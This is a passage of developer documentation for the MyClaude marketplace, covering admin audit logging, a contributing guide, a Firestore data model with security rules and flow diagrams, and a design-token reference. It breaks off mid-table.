fails, the request is denied. The reports list endpoint uses standard (fail-open) mode at a higher limit since it is read-only. ## Audit logging Every admin action writes a document to the `audit_logs` collection. | Field | Type | Description | |-------|------|-------------| | `action` | string | The action performed (e.g., `resolve_report`, `approve_product`, `ban_user`, `remove_product`, `dismiss_report`) | | `adminUid` | string | UID of the admin who performed the action | | `targetId` | string | ID of the affected resource (report, product, or user) | | `timestamp` | timestamp | When the action was performed | Audit logs are append-only. There is no API to delete or modify audit log entries. ## Security model | Control | Implementation | |---------|---------------| | Authentication | Firebase JWT verified via `admin.auth().verifyIdToken()` | | Authorization | `getUserRole()` checks role on every request; fail-closed | | Rate limiting | 5-30/min per user. Mutations use strict mode (blocks on limiter failure). | | RBAC granularity | Destructive operations (`ban`, `remove`) restricted to `admin` only | | Audit trail | All actions logged to `audit_logs` with admin UID and timestamp | ## Related pages - [Security Model](/docs/security/model) -- authentication and authorization architecture - [Content Reporting](/docs/security/content-reporting) -- how users file reports - [Trust & Safety](/docs/security/trust-safety) -- enforcement policy and dispute resolution - [API Overview](/docs/api/overview) -- base URL, error format, rate limiting --- # Contributing Set up a local MyClaude development environment, understand the codebase conventions, and submit your first pull request. ## Prerequisites | Tool | Version | Why | |------|---------|-----| | Node.js | 20+ | Runtime for Next.js 16 | | npm | 10+ | Package management | | Git | 2.x | Version control | | Firebase CLI | latest | Emulators for local auth and Firestore | ```bash $ node -v # must be >= 20 $ npm -v # must be >= 10 $ npx firebase --version ``` ## Local setup ```bash $ git clone https://github.com/your-org/vault-marketplace.git $ cd vault-marketplace $ npm install $ cp .env.example .env.local ``` Fill in `.env.local` with your Firebase project credentials, Stripe test keys, and R2 credentials. See the [Self-Hosting guide](/docs/developers/self-hosting) for a full variable reference. ### Start the dev server ```bash $ npm run dev ``` The app runs at `http://localhost:3000`. Hot reload is enabled. ### Firebase emulators (optional) For offline development without a live Firebase project: ```bash $ npx firebase emulators:start --only auth,firestore,storage ``` Point your `.env.local` Firebase config to the emulator endpoints. ## Project structure ``` src/ app/ # Next.js App Router pages and API routes components/ atoms/ # Small UI primitives (badges, buttons, inputs) molecules/ # Composed components (cards, search bars) organisms/ # Complex sections (headers, product grids) ui/ # shadcn/ui components (do not edit) contexts/ # React context providers (auth, language) lib/ server/ # Firebase Admin SDK (SSR + API routes ONLY) client/ # Firebase Client SDK (browser ONLY) i18n/ # Translation dictionaries types/ # Shared TypeScript types ``` ## Code conventions ### Dual SDK boundary This is the most important architectural rule. Violations break the build. | Context | SDK | Import from | |---------|-----|-------------| | Server Components, API routes | Firebase Admin | `@/lib/server/*` | | Client Components (`"use client"`) | Firebase Client | `@/lib/client/*` | Never import `lib/server/` in a `"use client"` file. Never import `lib/client/` in a Server Component. ### TypeScript - Strict mode enabled. No `any` unless absolutely necessary. - Named exports preferred over default exports (except page components). - Use `SafeProduct` / `SafeUserProfile` types in all client-facing code -- these strip sensitive fields like `fileUrl`. ### Atomic design Components follow the atoms > molecules > organisms hierarchy. A new button goes in `atoms/`. A card that composes multiple atoms goes in `molecules/`. A full page section goes in `organisms/`. ### Design system tokens All styling uses Tailwind theme tokens and custom `@utility` classes. Inline arbitrary values (`text-[#...]`, `bg-[oklch(...)]`) are prohibited. See the [design system rules](https://github.com/your-org/vault-marketplace/blob/master/.claude/rules/design-system.md) for the full policy. ## Making changes ### Branch naming Branch from `master`. No enforced naming convention, but descriptive names help: ```bash $ git checkout -b feat/add-search-filters ``` ### Commit messages Follow the format: ``` feat|fix|refactor: F{task_id} -- {description} ``` Examples: - `feat: F42 -- add category filter to explore page` - `fix: F38 -- prevent duplicate order creation on webhook retry` - `refactor: F50 -- extract rate limit config to constants` ## Testing ### Build gate `npm run build` is the primary quality gate. Every PR must pass a clean build. ```bash $ npm run build ``` This runs the prebuild script (generates docs assets), compiles TypeScript, and produces the production Next.js bundle. Type errors, missing imports, and broken server/client boundaries all fail here. ### Integration tests Integration tests live in `tests/`. Run them with: ```bash $ npx jest tests/integration-security.test.ts ``` ### Manual verification For API route changes, verify: 1. Auth token is extracted and verified via `admin.auth().verifyIdToken()` 2. User authorization is checked (ownership, admin role, ban status) 3. Rate limiting is applied (standard or strict) 4. No sensitive data leaks in the response ## Submitting a pull request ### PR description template ```markdown ## What changed One-sentence summary. ## Why Link to issue or task ID. ## Security checklist - [ ] Auth token verified on all new/modified API routes - [ ] User authorization checked (ownership, role, ban) - [ ] Input validated and sanitized - [ ] No fileUrl or sensitive data exposed to client - [ ] Rate limiting applied to new mutation routes - [ ] Error messages do not leak internal details ``` ### What reviewers look for | Area | Check | |------|-------| | SDK boundary | No cross-imports between `lib/server/` and `lib/client/` | | Types | `SafeProduct` / `SafeUserProfile` used in client components | | Auth | Every mutation route calls `verifyIdToken()` | | Design tokens | No inline arbitrary values in className strings | | Build | `npm run build` passes without errors | ## Related pages - [Architecture](/docs/getting-started/architecture) -- System design overview - [Security Model](/docs/security/model) -- Security architecture details - [Self-Hosting](/docs/developers/self-hosting) -- Full environment variable reference - [API Overview](/docs/api/overview) -- Endpoint groups and rate limits --- # Data Model Reference MyClaude uses 13 Firestore collections with camelCase naming, server-side order creation via Stripe webhooks, atomic username uniqueness, and XP deduplication logs. ## Overview | Property | Value | |---|---| | Database | Cloud Firestore | | Project | `claude-code-vault` | | Region | `us-central1` | | Naming convention | camelCase | | Schema version | 1.1.0 | | Total collections | 13 (8 root + 5 subcollection groups) | All timestamps use Firestore server timestamps. All counters use `FieldValue.increment()` for atomic updates. Document IDs follow the convention noted per collection. ## users/\{uid\} User profiles for creators, buyers, and admins. Document ID is the Firebase Auth UID. ### Core fields | Field | Type | Required | Default | Description | |---|---|---|---|---| | `uid` | string | yes | — | Firebase Auth UID | | `email` | string | yes | — | Account email (never exposed to client) | | `username` | string | yes | — | Unique, lowercase, 3-30 chars. Pattern: `^[a-z0-9_-]{3,30}$` | | `displayName` | string | yes | — | Public display name (max 100 chars) | | `bio` | string | no | — | Profile bio (max 500 chars) | | `avatarUrl` | string | no | — | Firebase Storage URL | | `country` | string | no | — | Two-letter country code | | `locale` | string | no | `"en"` | Preferred language (`en`, `pt-BR`, `es`) | ### Role and trust fields | Field | Type | Required | Default | Description | |---|---|---|---|---| | `role` | string | no | `"user"` | One of: `user`, `creator`, `verified_creator`, `admin` | | `rank` | string | no | — | Current gamification rank ID | | `verified` | boolean | no | `false` | Manually verified by admin | | `banned` | boolean | no | `false` | Account is banned | | `bannedBy` | string | no | — | UID of admin who issued ban | | `bannedAt` | timestamp | no | — | When ban was issued | | `status` | string | no | — | Set to `"deleted"` on account deletion | ### Stripe Connect fields | Field | Type | Required | Default | Description | |---|---|---|---|---| | `stripeAccountId` | string | no | `null` | Stripe Connect Express account ID | | `stripeOnboarded` | boolean | no | `false` | Onboarding completed | ### Gamification fields | Field | Type | Required | Default | Description | |---|---|---|---|---| | `xp` | number | yes | `0` | Total experience points | | `level` | number | yes | `0` | Current level | ### stats (map) Denormalized counters updated server-side via `increment()`. | Field | Type | Default | Description | |---|---|---|---| | `stats.followers` | number | `0` | Follower count | | `stats.following` | number | `0` | Following count | | `stats.products` | number | `0` | Published products | | `stats.downloads` | number | `0` | Total downloads received | | `stats.likes` | number | `0` | Total likes received | | `stats.totalRevenue` | number | `0` | Lifetime revenue in cents (USD) | | `stats.totalSales` | number | `0` | Total products sold | | `stats.reviewsReceived` | number | `0` | Reviews received across all products | | `stats.avgRating` | number | `0` | Weighted average rating | | `stats.messagesSent` | number | `0` | Messages sent in conversations | | `stats.productsBought` | number | `0` | Products purchased | | `stats.achievementCount` | number | `0` | Achievements unlocked | | `stats.categoryCount` | map | `{}` | Per-category product count, e.g. `{skills: 3, agents: 1}` | ### Timestamps | Field | Type | Required | Description | |---|---|---|---| | `createdAt` | timestamp | yes | Server timestamp at creation | | `updatedAt` | timestamp | yes | Server timestamp at last update | ### Security rules | Operation | Rule | |---|---| | Read | Public | | Create | `auth.uid == userId` | | Update | `auth.uid == userId` (cannot modify `stripeAccountId`, `stripeOnboarded`) | | Delete | Never (soft delete via account deletion endpoint) | ## users/\{uid\}/following/\{targetUid\} Tracks who this user follows. Document ID is the target user's UID. | Field | Type | Description | |---|---|---| | `createdAt` | timestamp | When the follow occurred | ## users/\{uid\}/followers/\{followerUid\} Tracks who follows this user. Document ID is the follower's UID. | Field | Type | Description | |---|---|---| | `createdAt` | timestamp | When the follow occurred | ## users/\{uid\}/achievements/\{achievementId\} Unlocked achievements for the user. | Field | Type | Description | |---|---|---| | `title` | string | Achievement name | | `description` | string | What the user did to earn it | | `icon` | string | Icon identifier | | `tier` | string | One of: `bronze`, `silver`, `gold`, `diamond` | | `unlockedAt` | timestamp | When unlocked | ## users/\{uid\}/notifications/\{notificationId\} In-app notifications. Auto-generated document ID. | Field | Type | Required | Default | Description | |---|---|---|---|---| | `type` | string | yes | — | One of: `purchase`, `download`, `follow`, `review`, `achievement`, `message`, `refund`, `system` | | `title` | string | yes | — | Notification headline | | `body` | string | no | — | Notification detail text | | `link` | string | no | — | Internal route to navigate to | | `read` | boolean | yes | `false` | Has user seen this | | `actorUid` | string | no | — | UID of user who triggered this | | `actorUsername` | string | no | — | Username of triggering user | | `createdAt` | timestamp | yes | — | Server timestamp | ## products/\{productId\} Published artifacts (skills, squads, agents, etc.). Document ID is auto-generated by Firestore. ### Identity fields | Field | Type | Required | Default | Description | |---|---|---|---|---| | `title` | string | yes | — | Product name (max 120 chars) | | `slug` | string | yes | — | URL-safe identifier, immutable after creation | | `description` | string | yes | — | Short description (max 5,000 chars) | | `readme` | string | no | — | Markdown content for product page (max 50,000 chars) | ### Classification fields | Field | Type | Required | Default | Description | |---|---|---|---|---| | `category` | string | yes | — | One of: `skills`, `squads`, `agents`, `workflows`, `design-systems`, `claude-md`, `prompts`, `applications`, `systems` | | `tags` | array\ | no | — | Up to 10 tags | ### Pricing fields | Field | Type | Required | Default | Description | |---|---|---|---|---| | `price` | number | yes | `0` | Price in USD (0 = free). Stored as float, converted to cents for Stripe | | `currency` | string | no | `"usd"` | Currency code | ### File fields | Field | Type | Required | Description | |---|---|---|---| | `fileUrl` | string | yes | R2 storage key or legacy Firebase Storage path. **Never exposed to client for paid products.** | | `fileName` | string | yes | Original filename | | `fileSize` | number | yes | File size in bytes | | `thumbnailUrl` | string | no | Product thumbnail URL | ### Author fields (denormalized) | Field | Type | Required | Description | |---|---|---|---| | `authorUid` | string | yes | Author's Firebase UID | | `authorUsername` | string | yes | Author's username | | `authorDisplayName` | string | yes | Author's display name | | `authorAvatar` | string | no | Author's avatar URL | ### Status and moderation fields | Field | Type | Required | Default | Description | |---|---|---|---|---| | `status` | string | yes | `"pending_review"` | One of: `draft`, `pending_review`, `published`, `archived`, `removed` | | `approvedBy` | string | no | — | Admin UID who approved | | `approvedAt` | timestamp | no | — | Approval timestamp | | `removedBy` | string | no | — | Admin UID who removed | | `removedAt` | timestamp | no | — | Removal timestamp | **Status lifecycle:** Client creates always set `pending_review` (enforced by Firestore rules). Only Admin SDK can set `published` or `removed`. ### Version and license fields | Field | Type | Required | Default | Description | |---|---|---|---|---| | `version` | string | no | `"1.0.0"` | Semantic version | | `changelog` | string | no | — | Changelog text (max 2,000 chars) | | `license` | string | no | `"MIT"` | One of: `MIT`, `Apache-2.0`, `GPL-3.0`, `BSD-3-Clause`, `ISC`, `CC-BY-4.0`, `CC-BY-SA-4.0`, `CC0-1.0`, `Proprietary`, `Custom` | ### Enrichment fields (CONDUIT pipeline) Present on CLI-published products that have been processed by the CONDUIT content pipeline. | Field | Type | Required | Description | |---|---|---|---| | `mcsLevel` | number | no | MCS certification level (1-5) | | `language` | string | no | Primary language of the product | | `longDescription` | string | no | Extended description from CONDUIT enrichment | | `installTarget` | string | no | Install target path | | `compatibility` | map | no | Compatibility info, e.g. `{claudeCode: ">=1.0"}` | | `dependencies` | map | no | Dependency info, e.g. `{myclaude: ["other-skill"]}` | ### stats (map) Denormalized counters. Updated server-side only — Firestore rules block client writes to `stats`. | Field | Type | Default | Description | |---|---|---|---| | `stats.downloads` | number | `0` | Download count | | `stats.likes` | number | `0` | Like count | | `stats.rating` | number | `0` | Average rating (1-5) | | `stats.reviewsCount` | number | `0` | Number of reviews | | `stats.purchaseCount` | number | `0` | Number of purchases | ### Timestamps | Field | Type | Required | Description | |---|---|---|---| | `createdAt` | timestamp | yes | Server timestamp at creation | | `updatedAt` | timestamp | yes | Server timestamp at last update | ### Security rules | Operation | Rule | |---|---| | Read | Public | | Create | Authenticated + `authorUid == auth.uid` + status must be `pending_review` | | Update | `authorUid == auth.uid` (cannot change `status`, `authorUid`, or `stats`) | | Delete | `authorUid == auth.uid` | ## products/\{productId\}/likes/\{userId\} One document per user per product. Document ID is the user's UID. | Field | Type | Description | |---|---|---| | `createdAt` | timestamp | When the like occurred | ## products/\{productId\}/versions/\{versionId\} Version history. Each file upload creates a version record. | Field | Type | Description | |---|---|---| | `version` | string | Semantic version string | | `fileUrl` | string | R2 storage key for this version | | `fileName` | string | Filename | | `fileSize` | number | Bytes | | `changelog` | string | What changed | | `createdAt` | timestamp | Upload timestamp | ## products/\{productId\}/reviews/\{reviewId\} Product reviews. Created server-side after purchase/download verification. | Field | Type | Required | Description | |---|---|---|---| | `authorUid` | string | yes | Reviewer's UID | | `authorUsername` | string | yes | Reviewer's username | | `authorDisplayName` | string | no | Reviewer's display name | | `authorAvatar` | string | no | Reviewer's avatar URL | | `rating` | number | yes | 1-5 stars | | `comment` | string | yes | Review text (max 1,000 chars) | | `createdAt` | timestamp | yes | Server timestamp | ## products/\{productId\}/downloads/\{userId\} Per-user download tracking. Used for review eligibility. Server-side only. | Field | Type | Description | |---|---|---| | `uid` | string | User's UID | | `downloadedAt` | timestamp | Server timestamp | ## orders/\{orderId\} Purchase records. **Created exclusively by the Stripe webhook** — never from client-side code. Document ID is the Stripe session ID (ensures idempotency). ### Party fields | Field | Type | Required | Description | |---|---|---|---| | `buyerUid` | string | yes | Buyer's Firebase UID | | `sellerUid` | string | yes | Seller's Firebase UID | ### Product snapshot (denormalized at purchase time) | Field | Type | Required | Description | |---|---|---|---| | `productId` | string | yes | Product document ID | | `productTitle` | string | yes | Product name at time of purchase | | `productCategory` | string | yes | Product category at time of purchase | ### Financial fields (all in cents USD) | Field | Type | Required | Description | |---|---|---|---| | `amount` | number | yes | Total charged | | `platformFee` | number | yes | Platform cut | | `sellerAmount` | number | yes | Seller receives | | `currency` | string | yes | Currency code (default `"usd"`) | ### Stripe references | Field | Type | Required | Description | |---|---|---|---| | `stripeSessionId` | string | yes | Checkout session ID | | `stripePaymentIntentId` | string | no | Payment intent ID | ### Status fields | Field | Type | Required | Description | |---|---|---|---| | `status` | string | yes | One of: `completed`, `refunded`, `disputed` | | `refundedAt` | timestamp | no | When refund was processed | ### Timestamps | Field | Type | Required | Description | |---|---|---|---| | `createdAt` | timestamp | yes | Server timestamp | | `updatedAt` | timestamp | yes | Server timestamp | ### Security rules | Operation | Rule | |---|---| | Read | `buyerUid == auth.uid` OR `sellerUid == auth.uid` | | Create | Never from client (webhook transaction only) | | Update | Never from client (webhook transaction only) | | Delete | Never | ## conversations/\{conversationId\} Buyer-seller messaging threads. Document ID format: `{productId}_{buyerUid}`. | Field | Type | Required | Default | Description | |---|---|---|---|---| | `productId` | string | yes | — | Related product | | `productTitle` | string | yes | — | Product name | | `productSlug` | string | yes | — | Product slug for linking | | `buyerUid` | string | yes | — | Buyer's UID | | `buyerUsername` | string | yes | — | Buyer's username | | `buyerDisplayName` | string | yes | — | Buyer's display name | | `buyerAvatar` | string | no | — | Buyer's avatar URL | | `sellerUid` | string | yes | — | Seller's UID | | `sellerUsername` | string | yes | — | Seller's username | | `sellerDisplayName` | string | yes | — | Seller's display name | | `sellerAvatar` | string | no | — | Seller's avatar URL | | `participants` | array\ | yes | — | `[buyerUid, sellerUid]` for `array-contains` queries | | `lastMessage` | string | no | — | Preview text (max 100 chars) | | `lastMessageAt` | timestamp | yes | — | Timestamp of most recent message | | `lastMessageSenderUid` | string | no | — | UID of last message sender | | `unreadBySeller` | number | — | `0` | Unread count for seller | | `unreadByBuyer` | number | — | `0` | Unread count for buyer | | `createdAt` | timestamp | yes | — | Server timestamp | ### Security rules | Operation | Rule | |---|---| | Read | `auth.uid` in `participants` array | | Create | Server-side only | | Update | Server-side only | | Delete | Never | ## conversations/\{conversationId\}/messages/\{messageId\} Individual messages within a conversation. | Field | Type | Required | Description | |---|---|---|---| | `senderUid` | string | yes | Sender's UID | | `senderUsername` | string | yes | Sender's username | | `senderDisplayName` | string | yes | Sender's display name | | `senderAvatar` | string | no | Sender's avatar URL | | `text` | string | yes | Message body (max 1,000 chars) | | `createdAt` | timestamp | yes | Server timestamp | ## usernames/\{username\} Atomic username uniqueness registry. Document ID is the lowercase username string. **Admin SDK only** — no client reads or writes. | Field | Type | Required | Description | |---|---|---|---| | `uid` | string | yes | UID of the username owner | | `claimedAt` | timestamp | yes | Server timestamp | ### Security rules All operations: Admin SDK only. Client reads and writes are denied. ## reports/\{reportId\} Content reports for moderation. Auto-generated document ID. | Field | Type | Required | Default | Description | |---|---|---|---|---| | `reporterUid` | string | yes | — | UID of reporter | | `targetType` | string | yes | — | One of: `product`, `review`, `user` | | `targetId` | string | yes | — | ID of reported entity | | `reason` | string | yes | — | One of: `malicious_content`, `spam`, `inappropriate`, `copyright`, `other` | | `description` | string | no | — | Details (max 1,000 chars) | | `status` | string | yes | `"pending"` | One of: `pending`, `resolved`, `dismissed` | | `resolvedBy` | string | no | — | Admin UID who resolved | | `resolvedAt` | timestamp | no | — | Resolution timestamp | | `createdAt` | timestamp | yes | — | Server timestamp | ### Security rules | Operation | Rule | |---|---| | Read | Admin only (Admin SDK) | | Create | Authenticated + `reporterUid == auth.uid` | | Update | Admin only (Admin SDK) | | Delete | Never | ## xp\_logs/\{logId\} XP award deduplication. Document ID format: `{uid}_{action}_{dedupKey}`. Prevents double-awarding XP for the same action. | Field | Type | Required | Description | |---|---|---|---| | `action` | string | yes | XP action type | | `amount` | number | yes | XP awarded | | `uid` | string | yes | User UID | | `createdAt` | timestamp | yes | When XP was awarded | ### Security rules | Operation | Rule | |---|---| | Read | Owner only (logId prefix matches `auth.uid`) | | Create | Owner only (logId prefix matches `auth.uid`) | | Update | Never | | Delete | Never | ## audit\_logs/\{logId\} Security-relevant action log. **Admin SDK only**, fire-and-forget. Auto-generated document ID. | Field | Type | Required | Description | |---|---|---|---| | `action` | string | yes | Action performed | | `uid` | string | yes | UID of actor | | `details` | map | no | Additional context | | `timestamp` | timestamp | yes | Server timestamp | ### Security rules All operations: Admin SDK only. No client access. ## rate\_limits/\{limitId\} Firestore-backed rate limiting for serverless API routes. Document ID format: `{ip}__{path}`. **Admin SDK only**. | Field | Type | Required | Description | |---|---|---|---| | `count` | number | yes | Request count in current window | | `resetAt` | number | yes | Unix timestamp (ms) when window resets | | `ip` | string | yes | Client IP address | | `path` | string | yes | API route path | ### Security rules All operations: Admin SDK only. No client access. ## Composite indexes ### products | Fields | Purpose | |---|---| | `status` ASC, `createdAt` DESC | Explore page — newest first | | `status` ASC, `stats.likes` DESC | Explore page — most liked | | `status` ASC, `stats.downloads` DESC | Explore page — most downloaded | | `status` ASC, `stats.rating` DESC | Explore page — highest rated | | `status` ASC, `category` ASC, `createdAt` DESC | Category filter — newest | | `status` ASC, `category` ASC, `stats.likes` DESC | Category filter — most liked | | `status` ASC, `category` ASC, `stats.downloads` DESC | Category filter — most downloaded | | `authorUid` ASC, `createdAt` DESC | Author dashboard | | `authorUsername` ASC, `status` ASC, `createdAt` DESC | Public profile page | | `authorUid` ASC, `status` ASC, `createdAt` DESC | Author page (UID variant) | ### orders | Fields | Purpose | |---|---| | `sellerUid` ASC, `createdAt` DESC | Seller sales dashboard | | `buyerUid` ASC, `createdAt` DESC | Buyer purchase history | | `productId` ASC, `buyerUid` ASC, `status` ASC | Purchase verification (download auth) | | `buyerUid` ASC, `status` ASC, `createdAt` DESC | Filtered purchase history | ### conversations | Fields | Purpose | |---|---| | `participants` ARRAY_CONTAINS, `lastMessageAt` DESC | User's conversation list | | `productId` ASC, `sellerUid` ASC, `lastMessageAt` DESC | Product-specific threads | ### reports | Fields | Purpose | |---|---| | `status` ASC, `createdAt` DESC | Admin moderation queue | | `reporterUid` ASC, `targetType` ASC, `targetId` ASC | Duplicate report check | | `reporterUid` ASC, `createdAt` ASC | Reporter history | ## Storage Product files and user assets are stored across two systems: | System | Content | Access | |---|---|---| | Cloudflare R2 | Product files (`products/{key}/{fileName}`) | Presigned URLs only (5-30 min expiry) | | Firebase Storage | Avatars (`users/{uid}/**`), thumbnails (`products/{id}/thumbnails/`) | Public read for images | | Firebase Storage (legacy) | Old product files (`products/{id}/files/`) | `allow read: if false` (signed URLs only) | Max file size: 50MB for product files, 5MB for images. Images restricted to `image/*` content type. ## Data flow diagrams ### Purchase flow ``` Buyer clicks "Buy" → POST /api/stripe/checkout (Bearer token) → Server verifies auth token → Server creates Stripe Checkout Session → Buyer redirected to Stripe payment page → Buyer completes payment → Stripe fires webhook → POST /api/stripe/webhooks → Server creates order document (Firestore transaction) → Server increments product stats.purchaseCount → Server increments seller stats.totalSales + totalRevenue → Server increments buyer stats.productsBought → Buyer returns to product page → Client checks order exists for user+product → Download button becomes available ``` ### Download flow ``` User clicks "Download" → POST /api/products/download (Bearer token) → Server verifies auth token → If paid: server checks order exists (buyerUid + productId) → If free: server allows → Server generates presigned R2 URL (5 min expiry) → Server records download in products/{id}/downloads/{uid} → Server increments product stats.downloads → Server increments author stats.downloads → Returns signed URL → Client opens URL in new tab ``` ### Publish flow ``` Creator submits product form → Client uploads file to R2 via presigned upload URL → Client uploads thumbnail to Firebase Storage → Client creates product document (status: "pending_review") → Firestore rules enforce status == "pending_review" → Admin reviews product (Admin SDK) → Admin sets status to "published" → Product appears in explore page ``` ### Review flow ``` User clicks "Write Review" → POST /api/products/reviews (Bearer token) → Server verifies auth token → Server checks download record exists (review eligibility) → Server creates review in products/{id}/reviews/{reviewId} → Server recalculates product stats.rating + stats.reviewsCount → Server increments author stats.reviewsReceived → Server recalculates author stats.avgRating ``` ## Safe types Two safe types strip sensitive fields before passing data to client components: | Type | Omits | Purpose | |---|---|---| | `SafeProduct` | `fileUrl` | Prevents client from accessing paid product files directly | | `SafeUserProfile` | `email`, `stripeAccountId`, `stats.totalSales`, `stats.totalRevenue` | Protects PII and financial data | Server components fetch full documents, strip fields, then pass `SafeProduct` or `SafeUserProfile` to client islands. --- # Design System Reference MyClaude's design system uses OKLCH color tokens, a Minor Third typography scale, glow-only shadows, step-based motion, and a strict token-only policy that prohibits all inline values. ## Philosophy Three principles govern every pixel: 1. **Dark terminal aesthetic.** The UI is a hacker's terminal, not a SaaS dashboard. Warm terracotta primary, warm neutral backgrounds, phosphor-tinted category colors. Dark-only for v1. 2. **Glow, not shadow.** No traditional `box-shadow` elevation. Depth is communicated through luminous glow effects that reinforce the terminal identity. 3. **Token-only enforcement.** Zero inline colors, font sizes, or shadows in component code. Every visual property references a design token. This is enforced by code review rules, not just convention. All color values use OKLCH color space. All tokens are defined in `globals.css` via `@theme inline`. ## Color tokens ### Semantic colors | Token | Tailwind class | Purpose | |---|---|---| | `--background` | `bg-background` | Page background (L0 surface) | | `--foreground` | `text-foreground` | Primary text | | `--card` | `bg-card` | Card surface (L1) | | `--card-foreground` | `text-card-foreground` | Text on cards | | `--popover` | `bg-popover` | Popover/dropdown surface (L2) | | `--popover-foreground` | `text-popover-foreground` | Text in popovers | | `--primary` | `bg-primary`, `text-primary` | Warm terracotta — brand color | | `--primary-foreground` | `text-primary-foreground` | Text on primary backgrounds | | `--secondary` | `bg-secondary` | Secondary surface | | `--secondary-foreground` | `text-secondary-foreground` | Text on secondary | | `--muted` | `bg-muted` | Muted/disabled surface | | `--muted-foreground` | `text-muted-foreground` | Muted text, metadata | | `--accent` | `bg-accent` | Accent surface (hover states) | | `--accent-foreground` | `text-accent-foreground` | Text on accent | | `--destructive` | `bg-destructive`, `text-destructive` | Error/danger actions | | `--border` | `border-border` | All borders | | `--input` | `bg-input` | Input field backgrounds | | `--ring` | `ring-ring` | Focus rings | ### Phosphor category palette Each product category has a dedicated color for instant visual identification. | Token | Tailwind class | Category | |---|---|---| | `--vault-green` | `text-vault-green` | Skills | | `--vault-cyan` | `text-vault-cyan` | Squads | | `--vault-amber` | `text-vault-amber` | Agents | | `--vault-violet` | `text-vault-violet` | Workflows | | `--vault-magenta` | `text-vault-magenta` | Design Systems | | `--vault-gold` | `text-vault-gold` | CLAUDE.md | | `--vault-blue` | `text-vault-blue` | Prompts | | `--vault-lime` | `text-vault-lime` | Applications | | `--vault-rose` | `text-vault-rose` | Systems | The `--vault-green-muted` variant provides a 15% opacity version for background tints. ### Status colors | Token | Tailwind class | Purpose | |---|---|---| | `--vault-success` | `text-vault-success` | Success states (maps to green) | | `--vault-warning` | `text-vault-warning` | Warnings (maps to gold) | | `--vault-error` | `text-vault-error` | Errors (maps to destructive) | | `--vault-info` | `text-vault-info` | Informational (maps to blue) | ### Chart colors Five chart colors (`--chart-1` through `--chart-5`) are provided for data visualization. `chart-1` maps to primary terracotta. ## Typography scale Font: Geist Mono (primary), Geist Sans (fallback). Scale follows Minor Third ratio (1.2) from a 14px base. | Level | Class | Size | Line height | Letter spacing | Weight | Use | |---|---|---|---|---|---|---| | Display | `text-xl` / `text-2xl` + `font-semibold` | 20-24px | 1.2 | -0.02em | 600 | Hero titles, page titles | | Heading | `text-sm` + `font-semibold` | 14px | 1.3 | -0.01em | 600 | Section titles, card titles | | Body | `text-xs` | 12px | 1.5 | normal | 400 | Content, descriptions, nav, buttons | | Caption | `text-micro` | 10px | 1.4 | 0.02em | 400 | Metadata, timestamps | | System | `text-system` | 10px | 1.15 | 0.08em | 500 | Labels, tags, table headers (uppercase) | | Nano | `text-nano` | 8px | 1.2 | 0.04em | 400 | Fine print, version numbers | The `text-mini` utility (11px, lh 1.4, 0.01em tracking) sits between Body and Caption for edge cases. **Rule:** Navigation chrome and buttons always use `text-xs` (Body), never Caption. Caption is for metadata only. ## Custom utilities Defined in `globals.css` via `@utility`: | Utility | Output | |---|---| | `text-nano` | `font-size: 0.5rem; line-height: 1.2; letter-spacing: 0.04em` | | `text-micro` | `font-size: 0.625rem; line-height: 1.4; letter-spacing: 0.02em` | | `text-mini` | `font-size: 0.6875rem; line-height: 1.4; letter-spacing: 0.01em` | | `text-system` | `font-size: 0.625rem; line-height: 1.15; letter-spacing: 0.08em; text-transform: uppercase; font-weight: 500` | | `safe-bottom` | `padding-bottom: env(safe-area-inset-bottom, 0)` | | `scrollbar-none` | Hides scrollbar across all browsers | | `animate-blink` | Terminal cursor blink (1s step-end infinite) | **Never** manually compose `text-micro uppercase tracking-wider` — use `text-system` instead. ## Spacing system Tailwind v4 built-in on a 4px base grid. No custom spacing tokens. | Class | Value | Use | |---|---|---| | `p-1`, `gap-1`, `m-1` | 4px | Tight internal padding | | `p-2`, `gap-2`, `m-2` | 8px | Standard internal padding | | `p-3`, `gap-3`, `m-3` | 12px | Card content padding | | `p-4`, `gap-4`, `m-4` | 16px | Section padding | | `p-6`, `gap-6`, `m-6` | 24px | Large section gaps | | `p-8`, `gap-8`, `m-8` | 32px | Page-level spacing | All Tailwind spacing utilities are available. Do not create custom `--space-*` tokens. ## Surface hierarchy Five surface levels from darkest (L0) to lightest (L4). Each level adds approximately +4 lightness in OKLCH. | Level | Token | Tailwind class | OKLCH lightness (dark) | Use | |---|---|---|---|---| | L0 | `--background` | `bg-background` | 0.145 | Page background | | L1 | `--card` | `bg-card` | 0.185 | Cards, panels | | L2 | `--popover` / `--secondary` | `bg-popover`, `bg-secondary` | 0.225 | Popovers, dropdowns, muted areas | | L3 | `--accent` | `bg-accent` | 0.265 | Hover states, active items | | L4 | (border) | `border-border` | 0.265 | Borders, dividers | Surfaces never use opacity for layering — each level is a distinct opaque color. ## Shadow and glow system No traditional `box-shadow` elevation. All depth is communicated through glow. ### Glow classes | Class | Effect | Use | |---|---|---| | `.glow-box` | `box-shadow: var(--glow-sm)` | Subtle container emphasis | | `.glow-primary` | `text-shadow: var(--glow-text)` | Terracotta text glow | | `.glow-green` | `text-shadow` with vault-green | Status/success text glow | ### Glow tokens | Token | Spread | Opacity | |---|---|---| | `--glow-sm` | 8px | 12% | | `--glow-md` | 16px | 15% | | `--glow-lg` | 24px | 18% | | `--glow-text` | 6px | 35% | The Black (AMOLED) theme intensifies glow values for high-contrast displays. ## Motion tokens Terminal-native motion: instant snaps or barely perceptible transitions. No elastic easing, no spring physics. | Token | Tailwind class | Value | Use | |---|---|---|---| | `--transition-duration-instant` | `duration-instant` | 0ms | Immediate state change | | `--transition-duration-snap` | `duration-snap` | 75ms | Hover/focus feedback | | `--transition-duration-fast` | `duration-fast` | 100ms | Transitions, reveals | | `--transition-duration-normal` | `duration-normal` | 150ms | Complex transitions | | `--transition-duration-slow` | `duration-slow` | 300ms | Layout shifts (rare) | | `--transition-timing-function-terminal` | `ease-terminal` | `steps(1)` | Binary on/off (cursor blink) | | `--transition-timing-function-snap` | `ease-snap` | `cubic-bezier(0.2, 0, 0, 1)` | Fast-in, immediate-out | **Rule:** Prefer `duration-snap` + `ease-snap` for most interactions. Use `ease-terminal` only for binary state toggles. ## Z-index scale Seven named layers. Never use arbitrary `z-[...]` values. | Token | Tailwind class | Value | Use | |---|---|---|---| | `--z-index-base` | `z-base` | 0 | Default stacking | | `--z-index-raised` | `z-raised` | 1 | Cards above siblings | | `--z-index-dropdown` | `z-dropdown` | 10 | Dropdowns, menus | | `--z-index-sticky` | `z-sticky` | 20 | Sticky headers, nav | | `--z-index-overlay` | `z-overlay` | 30 | Overlay backgrounds | | `--z-index-modal` | 